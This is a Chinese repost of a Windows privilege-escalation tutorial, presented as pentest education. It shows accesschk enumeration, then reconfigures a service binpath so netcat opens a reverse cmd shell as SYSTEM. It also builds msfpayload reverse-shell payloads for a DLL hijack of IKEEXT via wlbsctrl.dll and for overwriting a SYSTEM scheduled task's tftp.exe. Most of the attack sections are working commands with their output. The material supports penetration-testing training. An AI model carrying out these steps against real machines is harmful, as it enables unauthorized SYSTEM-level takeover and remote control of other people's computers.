# We can see the permissions that each user level has, you can also use "accesschk.exe -ucqv *" to listall services.C:> accesschk.exe -ucqv SpoolerSpooler  R  NT AUTHORITYAuthenticated Users        SERVICE_QUERY_STATUS        SERVICE_QUERY_CONFIG        SERVICE_INTERROGATE        SERVICE_ENUMERATE_DEPENDENTS        SERVICE_USER_DEFINED_CONTROL        READ_CONTROL  R  BUILTINPower Users        SERVICE_QUERY_STATUS        SERVICE_QUERY_CONFIG        SERVICE_INTERROGATE        SERVICE_ENUMERATE_DEPENDENTS        SERVICE_START        SERVICE_USER_DEFINED_CONTROL        READ_CONTROL  RW BUILTINAdministrators        SERVICE_ALL_ACCESS  RW NT AUTHORITYSYSTEM        SERVICE_ALL_ACCESS

Accesschk 可以自动检查我们是否具有对特定用户级别的 Windows 服务的写访问权限。通常作为低权限用户,我们会希望检查 "Authenticated Users"。请确保检查您的用户属于哪些用户组,例如,“Power Users” 被认为是一个低权限用户组(尽管它并不常用)。

让我们比较一下在 Windows 8 和 Windows XP SP0 上的输出。

# This is on Windows 8.C:Usersb33ftoolsSysinternals> accesschk.exe -uwcqv "Authenticated Users" *No matching objects found.# On a default Windows XP SP0 we can see there is a pretty big security fail.C:> accesschk.exe -uwcqv "Authenticated Users" *RW SSDPSRV        SERVICE_ALL_ACCESSRW upnphost        SERVICE_ALL_ACCESSC:> accesschk.exe -ucqv SSDPSRVSSDPSRV  RW NT AUTHORITYSYSTEM        SERVICE_ALL_ACCESS  RW BUILTINAdministrators        SERVICE_ALL_ACCESS  RW NT AUTHORITYAuthenticated Users        SERVICE_ALL_ACCESS  RW BUILTINPower Users        SERVICE_ALL_ACCESS  RW NT AUTHORITYLOCAL SERVICE        SERVICE_ALL_ACCESSC:> accesschk.exe -ucqv upnphostupnphost  RW NT AUTHORITYSYSTEM        SERVICE_ALL_ACCESS  RW BUILTINAdministrators        SERVICE_ALL_ACCESS  RW NT AUTHORITYAuthenticated Users        SERVICE_ALL_ACCESS  RW BUILTINPower Users        SERVICE_ALL_ACCESS  RW NT AUTHORITYLOCAL SERVICE        SERVICE_ALL_ACCESS

这个问题在 XP SP2 的引入后得到了解决,然而在 SP0 和 SP1 上,它可以被用作一个通用的本地权限提升漏洞。通过重新配置服务,我们可以让它以 SYSTEM 级别权限运行我们选择的任意二进制文件。

让我们看看这是如何在实践中完成的。在这种情况下,服务将执行 netcat 并以 SYSTEM 级别权限打开一个反向 shell。当然,还有其他选项是可能的。

C:> sc qc upnphost[SC] GetServiceConfig SUCCESSSERVICE_NAME: upnphost        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 3   DEMAND_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:WINDOWSSystem32svchost.exe -k LocalService        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Universal Plug and Play Device Host        DEPENDENCIES       : SSDPSRV        SERVICE_START_NAME : NT AUTHORITYLocalServiceC:> sc config upnphost binpath= "C:nc.exe -nv 127.0.0.1 9988 -e C:WINDOWSSystem32cmd.exe"[SC] ChangeServiceConfig SUCCESSC:> sc config upnphost obj= ".LocalSystem" password= ""[SC] ChangeServiceConfig SUCCESSC:> sc qc upnphost[SC] GetServiceConfig SUCCESSSERVICE_NAME: upnphost        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 3   DEMAND_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:nc.exe -nv 127.0.0.1 9988 -e C:WINDOWSSystem32cmd.exe        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : Universal Plug and Play Device Host        DEPENDENCIES       : SSDPSRV        SERVICE_START_NAME : LocalSystemC:> net start upnphost

Windows 权限提升基础知识

我们并不总是能够完全访问一个服务,即使它配置不正确。下面的图片摘自 Brett Moore 在 Windows 权限提升方面的演示,其中的任何访问权限都将给我们一个 SYSTEM shell。

Windows 权限提升基础知识

重要的是要记住我们要弄清楚我们受到攻击的会话属于哪些用户组。如前所述,“Power Users”也被认为是一个低权限用户组。"Power Users" 有自己一套漏洞,Mark Russinovich 写了一篇非常有趣的文章,介绍了这个主题。

文章名称是 "The Power in Power Users" (Mark Russinovich) - [这里](https://docs.microsoft.com/en-us/sysinternals/learn/the-power-in-power-users)

最后,我们将检查文件/文件夹权限,如果我们无法直接攻击操作系统,我们将让操作系统来完成所有艰苦的工作。这里需要涵盖的内容太多,所以我将向你展示两种权限漏洞以及如何利用它们。一旦你掌握了一般思路,你就能够将这些技术应用到其他情况中。

对于我们的第一个例子,我们将复制 GreyHatHacker 的 Parvez 写的一篇文章的结果;"Elevating privileges by exploiting weak folder permissions"。这是一个很好的权限提升文章,我强烈建议你阅读他的文章 [这里](https://www.greyhathacker.net/?p=738)。

这个例子是 DLL 劫持的一个特例。程序通常不能自行运行,它们有很多需要连接的资源(主要是 DLL,但也包括专有文件)。如果一个程序或服务从我们有写访问权限的目录加载文件,我们可以滥用这一点以以程序运行权限弹出一个 shell。

一般来说,Windows 应用程序会使用预定义的搜索路径来查找 DLL,并按特定顺序检查这些路径。DLL 劫持通常发生在将恶意 DLL 放置在其中一个路径中并确保在合法 DLL 之前找到该 DLL 的情况下。这个问题可以通过应用程序指定 DLL 的绝对路径来减轻。

你可以在 32 位系统上看到 DLL 搜索顺序如下:

1 - 应用程序加载的目录

2 - 32 位系统目录 (C:WindowsSystem32)

3 - 16 位系统目录 (C:WindowsSystem)

4 - Windows 目录 (C:Windows)

5 - 当前工作目录 (CWD)

6 - PATH 环境变量中的目录 (系统然后用户)

有时应用程序尝试加载在计算机上不存在的 DLL。这可能是由于几个原因,例如,如果 DLL 仅对某些未安装的插件或功能所需,则会发生这种情况。在这种情况下,Parvez 发现某些 Windows 服务尝试加载默认安装中不存在的 DLL。

由于所涉及的 DLL 不存在,我们将结束遍历所有搜索路径。作为低权限用户,我们几乎无法将恶意 DLL 放置在 1-4 中,5 在这种情况下不可能,因为我们正在讨论一个 Windows 服务,但如果我们对 Windows PATH 中的任何目录具有写访问权限,我们就赢了。

让我们看看这在实践中是如何工作的,对于我们的示例,我们将使用 IKEEXT(IKE 和 AuthIP IPsec Keying Modules)服务,该服务尝试加载 wlbsctrl.dll。

# This is on Windows 7 as low privilege user1.C:Usersuser1Desktop> echo %username%user1# We have a win here since any non-default directory in "C:" will give write access to authenticatedusers.C:Usersuser1Desktop> echo %path%C:Windowssystem32;C:Windows;C:WindowsSystem32Wbem;C:WindowsSystem32WindowsPowerShellv1.0;C:Program FilesOpenVPNbin;C:Python27# We can check our access permissions with accesschk or cacls.C:Usersuser1Desktop> accesschk.exe -dqv "C:Python27"C:Python27  Medium Mandatory Level (Default) [No-Write-Up]  RW BUILTINAdministrators        FILE_ALL_ACCESS  RW NT AUTHORITYSYSTEM        FILE_ALL_ACCESS  R  BUILTINUsers        FILE_LIST_DIRECTORY        FILE_READ_ATTRIBUTES        FILE_READ_EA        FILE_TRAVERSE        SYNCHRONIZE        READ_CONTROL  RW NT AUTHORITYAuthenticated Users        FILE_ADD_FILE        FILE_ADD_SUBDIRECTORY        FILE_LIST_DIRECTORY        FILE_READ_ATTRIBUTES        FILE_READ_EA        FILE_TRAVERSE        FILE_WRITE_ATTRIBUTES        FILE_WRITE_EA        DELETE        SYNCHRONIZE        READ_CONTROLC:Usersuser1Desktop> cacls "C:Python27"C:Python27 BUILTINAdministrators:(ID)F            BUILTINAdministrators:(OI)(CI)(IO)(ID)F            NT AUTHORITYSYSTEM:(ID)F            NT AUTHORITYSYSTEM:(OI)(CI)(IO)(ID)F            BUILTINUsers:(OI)(CI)(ID)R            NT AUTHORITYAuthenticated Users:(ID)C            NT AUTHORITYAuthenticated Users:(OI)(CI)(IO)(ID)C# Before we go over to action we need to check the status of the IKEEXT service. In this case we can seeit is set to "AUTO_START" so it will launch on boot!C:Usersuser1Desktop> sc qc IKEEXT[SC] QueryServiceConfig SUCCESSSERVICE_NAME: IKEEXT        TYPE               : 20  WIN32_SHARE_PROCESS        START_TYPE         : 2   AUTO_START        ERROR_CONTROL      : 1   NORMAL        BINARY_PATH_NAME   : C:Windowssystem32svchost.exe -k netsvcs        LOAD_ORDER_GROUP   :        TAG                : 0        DISPLAY_NAME       : IKE and AuthIP IPsec Keying Modules        DEPENDENCIES       : BFE        SERVICE_START_NAME : LocalSystem

现在我们知道满足的必要条件,我们可以生成一个恶意的 DLL 并弹出一个 shell!

root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' O       Name: Windows Command Shell, Reverse TCP Inline     Module: payload/windows/shell_reverse_tcp   Platform: Windows       Arch: x86Needs Admin: No Total size: 314       Rank: NormalProvided by:  vlad902 <[email protected]>  sf <[email protected]>Basic options:Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique: seh, thread, process, noneLHOST     127.0.0.1        yes       The listen addressLPORT     9988             yes       The listen portDescription:  Connect back to attacker and spawn a command shellroot@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' D > /root/Desktop/evil.dllCreated by msfpayload (http://www.metasploit.com).Payload: windows/shell_reverse_tcp Length: 314Options: {"lhost"=>"127.0.0.1", "lport"=>"9988"}

在将 DLL 传输到目标计算机后,我们只需要将其重命名为 wlbsctrl.dll,并移动到 "C:Python27"。完成这些步骤后,我们需要耐心等待机器重新启动(或者我们可以尝试强制重新启动),我们将获得一个 SYSTEM shell。

# Again, this is as low privilege user1.C:Usersuser1Desktop> dir Volume in drive C has no label. Volume Serial Number is 948D-A98F Directory of C:Usersuser1Desktop02/18/2014  01:49 PM    <DIR>          .02/18/2014  01:49 PM    <DIR>          ..04/22/2013  09:39 AM           331,888 accesschk.exe02/18/2014  12:38 PM            14,336 evil.dll01/25/2014  12:46 AM            36,864 fubar.exe01/22/2014  08:17 AM    <DIR>          incognito206/30/2011  01:52 PM         1,667,584 ncat.exe11/22/2013  07:39 PM             1,225 wmic_info.bat               5 File(s)      2,051,897 bytes               3 Dir(s)      73,052,160 bytes freeC:Usersuser1Desktop> copy evil.dll C:Python27wlbsctrl.dll        1 file(s) copied.C:Usersuser1Desktop> dir C:Python27 Volume in drive C has no label. Volume Serial Number is 948D-A98F Directory of C:Python2702/18/2014  01:53 PM    <DIR>          .02/18/2014  01:53 PM    <DIR>          ..10/20/2012  02:52 AM    <DIR>          DLLs10/20/2012  02:52 AM    <DIR>          Doc10/20/2012  02:52 AM    <DIR>          include01/28/2014  03:45 AM    <DIR>          Lib10/20/2012  02:52 AM    <DIR>          libs04/10/2012  11:34 PM            40,092 LICENSE.txt04/10/2012  11:18 PM           310,875 NEWS.txt04/10/2012  11:31 PM            26,624 python.exe04/10/2012  11:31 PM            27,136 pythonw.exe04/10/2012  11:18 PM            54,973 README.txt10/20/2012  02:52 AM    <DIR>          tcl10/20/2012  02:52 AM    <DIR>          Tools04/10/2012  11:31 PM            49,664 w9xpopen.exe02/18/2014  12:38 PM            14,336 wlbsctrl.dll               7 File(s)        523,700 bytes               9 Dir(s)      73,035,776 bytes free

一切都已设置好,现在我们只需要等待系统重新启动。为了演示目的,我在下面包含了一个截图,在截图中我使用管理员命令提示符手动重启了服务。

Windows 权限提升基础知识

在我们的最后一个例子中,我们将看一下计划任务。回顾我们之前收集的结果,我们遇到了以下条目:

HostName:                             B33FTaskName:                             LogGrabberTFTPNext Run Time:                        2/19/2014 9:00:00 AMStatus:                               ReadyLogon Mode:                           Interactive/BackgroundLast Run Time:                        N/ALast Result:                          1Author:                               B33Fb33fTask To Run:                          E:GrabLogstftp.exe 10.1.1.99 GET log.out E:GrabLogsLogslog.txtStart In:                             N/AComment:                              N/AScheduled Task State:                 EnabledIdle Time:                            DisabledPower Management:                     Stop On Battery Mode, No Start On BatteriesRun As User:                          SYSTEMDelete Task If Not Rescheduled:       EnabledStop Task If Runs X Hours and X Mins: 72:00:00Schedule:                             Scheduling data is not available in this format.Schedule Type:                        DailyStart Time:                           9:00:00 AMStart Date:                           2/17/2014End Date:                             N/ADays:                                 Every 1 day(s)Months:                               N/ARepeat: Every:                        DisabledRepeat: Until: Time:                  DisabledRepeat: Until: Duration:              DisabledRepeat: Stop If Still Running:        Disabled

看起来盒子上有一个 TFTP 客户端,它正在连接到远程主机并获取某种日志文件。我们可以看到该任务每天早上 9 点运行,并且以 SYSTEM 级别权限运行(糟糕)。让我们看看我们是否对这个文件夹有写访问权限。

C:Usersuser1Desktop> accesschk.exe -dqv "E:GrabLogs"E:GrabLogs  Medium Mandatory Level (Default) [No-Write-Up]  RW BUILTINAdministrators        FILE_ALL_ACCESS  RW NT AUTHORITYSYSTEM        FILE_ALL_ACCESS  RW NT AUTHORITYAuthenticated Users        FILE_ADD_FILE        FILE_ADD_SUBDIRECTORY        FILE_LIST_DIRECTORY        FILE_READ_ATTRIBUTES        FILE_READ_EA        FILE_TRAVERSE        FILE_WRITE_ATTRIBUTES        FILE_WRITE_EA        DELETE        SYNCHRONIZE        READ_CONTROL  R  BUILTINUsers        FILE_LIST_DIRECTORY        FILE_READ_ATTRIBUTES        FILE_READ_EA        FILE_TRAVERSE        SYNCHRONIZE        READ_CONTROLC:Usersuser1Desktop> dir "E:GrabLogs" Volume in drive E is More Volume Serial Number is FD53-2F00 Directory of E:GrabLogs02/18/2014  11:34 PM    <DIR>          .02/18/2014  11:34 PM    <DIR>          ..02/18/2014  11:34 PM    <DIR>          Logs02/18/2014  09:21 PM           180,736 tftp.exe               1 File(s)        180,736 bytes               3 Dir(s)   5,454,602,240 bytes free

显然,这是一个严重的配置问题,这个任务没有必要以 SYSTEM 权限运行,但更糟糕的是,任何经过身份验证的用户都可以对该文件夹进行写访问。理想情况下,对于渗透测试任务,我会获取 TFTP 客户端,对 PE 可执行文件进行后门处理,确保它仍然完美运行,然后将其放回目标机器。然而,出于这个例子的目的,我们可以简单地用 metasploit 生成的可执行文件覆盖二进制文件。

root@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' O       Name: Windows Command Shell, Reverse TCP Inline     Module: payload/windows/shell_reverse_tcp   Platform: Windows       Arch: x86Needs Admin: No Total size: 314       Rank: NormalProvided by:  vlad902 <[email protected]>  sf <[email protected]>Basic options:Name      Current Setting  Required  Description----      ---------------  --------  -----------EXITFUNC  process          yes       Exit technique: seh, thread, process, noneLHOST     127.0.0.1        yes       The listen addressLPORT     9988             yes       The listen portDescription:  Connect back to attacker and spawn a command shellroot@darkside:~# msfpayload windows/shell_reverse_tcp lhost='127.0.0.1' lport='9988' R | msfencode -texe > /root/Desktop/evil-tftp.exe[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)

现在剩下的就是上传我们的恶意可执行文件并覆盖 "E:GrabLogstftp.exe"。一旦完成,我们就可以早早地入睡,然后在早上醒来等待我们的 shell。这里需要记住的一件重要事情是我们要检查我们试图入侵的盒子的时间/时区。

C:Usersuser1Desktop> dir Volume in drive C has no label. Volume Serial Number is 948D-A98F Directory of C:Usersuser1Desktop02/19/2014  01:36 AM    <DIR>          .02/19/2014  01:36 AM    <DIR>          ..04/22/2013  09:39 AM           331,888 accesschk.exe02/19/2014  01:31 AM            73,802 evil-tftp.exe01/25/2014  12:46 AM            36,864 fubar.exe01/22/2014  08:17 AM    <DIR>          incognito206/30/2011  01:52 PM         1,667,584 ncat.exe02/18/2014  12:38 PM            14,336 wlbsctrl.dll11/22/2013  07:39 PM             1,225 wmic_info.bat               6 File(s)      2,125,699 bytes               3 Dir(s)      75,341,824 bytes freeC:Usersuser1Desktop> copy evil-tftp.exe E:GrabLogstftp.exeOverwrite E:GrabLogstftp.exe? (Yes/No/All): Yes        1 file(s) copied.

为了展示这种权限提升的实际效果,我将系统时间快进了。从下面的截图中可以看到,我们在早上 9 点准时获得了我们的 SYSTEM shell。

Windows 权限提升基础知识

这两个例子应该让你对考虑文件/文件夹权限时需要寻找的漏洞类型有所了解。你需要花时间检查 Windows 服务、计划任务和启动任务的所有 binpaths。

正如我们已经看到的,accesschk 是首选的工具。在结束之前,我想给你一些关于如何使用 accesschk 的最后指导。

# When executing any of the sysinternals tools for the first time the user will be presented with a GUIpop-up to accept the EULA. This is obviously a big problem, however we can add an extra command line flagto automatically accept the EULA.accesschk.exe /accepteula ... ... ...# Find all weak folder permissions per drive.accesschk.exe -uwdqs Users c:accesschk.exe -uwdqs "Authenticated Users" c:# Find all weak file permissions per drive.accesschk.exe -uwqs Users c:*.*accesschk.exe -uwqs "Authenticated Users" c:*.*

最后的想法

本指南旨在成为 Windows 权限升级的“基础知识”。如果你想真正掌握这门学科,你需要投入大量的工作和研究。与渗透测试的各个方面一样,枚举是关键,您对目标了解得越多,攻击的途径就越多,成功率就越高。

另请记住,有时您可能最终会将权限提升为管理员。将权限从管理员升级到系统不是问题,您始终可以使用系统级别权限重新配置服务或创建计划任务。

现在去弹出系统吧!

原文地址:https://fuzzysecurity.com/tutorials/16.html

原文始发于微信公众号(Ots安全):Windows 权限提升基础知识

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月19日22:08:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Windows 权限提升基础知识http://cn-sec.com/archives/2755663.html

发表评论

匿名网友 填写信息